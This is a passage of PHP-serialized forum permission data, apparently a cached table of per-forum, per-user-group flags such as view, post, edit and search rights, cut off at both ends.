\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:21;a:18:{s:3:\"pid\";s:3:\"994\";s:3:\"fid\";s:2:\"50\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:49;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"170\";s:3:\"fid\";s:2:\"49\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:5;a:13:{i:1;a:18:{s:3:\"pid\";s:3:\"596\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"597\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:9;a:18:{s:3:\"pid\";s:3:\"601\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:5;a:18:{s:3:\"pid\";s:3:\"598\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:6;a:18:{s:3:\"pid\";s:3:\"599\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:1:\"6\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:8;a:18:{s:3:\"pid\";s:3:\"600\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:10;a:18:{s:3:\"pid\";s:3:\"602\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:12;a:18:{s:3:\"pid\";s:3:\"603\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:13;a:18:{s:3:\"pid\";s:3:\"604\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:15;a:18:{s:3:\"pid\";s:3:\"605\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:17;a:18:{s:3:\"pid\";s:3:\"606\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"648\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:21;a:18:{s:3:\"pid\";s:3:\"764\";s:3:\"fid\";s:1:\"5\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:2;a:13:{i:1;a:18:{s:3:\"pid\";s:2:\"61\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:2:\"62\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:9;a:18:{s:3:\"pid\";s:2:\"65\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:5;a:18:{s:3:\"pid\";s:2:\"63\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:6;a:18:{s:3:\"pid\";s:3:\"599\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:1:\"6\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:8;a:18:{s:3:\"pid\";s:2:\"64\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:10;a:18:{s:3:\"pid\";s:2:\"66\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:12;a:18:{s:3:\"pid\";s:3:\"187\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:13;a:18:{s:3:\"pid\";s:3:\"221\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:15;a:18:{s:3:\"pid\";s:3:\"292\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:17;a:18:{s:3:\"pid\";s:3:\"606\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"649\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:21;a:18:{s:3:\"pid\";s:3:\"765\";s:3:\"fid\";s:1:\"2\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:48;a:13:{i:1;a:18:{s:3:\"pid\";s:3:\"682\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"683\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:9;a:18:{s:3:\"pid\";s:3:\"687\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:3;a:18:{s:3:\"pid\";s:3:\"684\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:1:\"3\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"685\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"686\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"688\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"689\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"690\";s:3:\"fid\";s:2:\"48\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"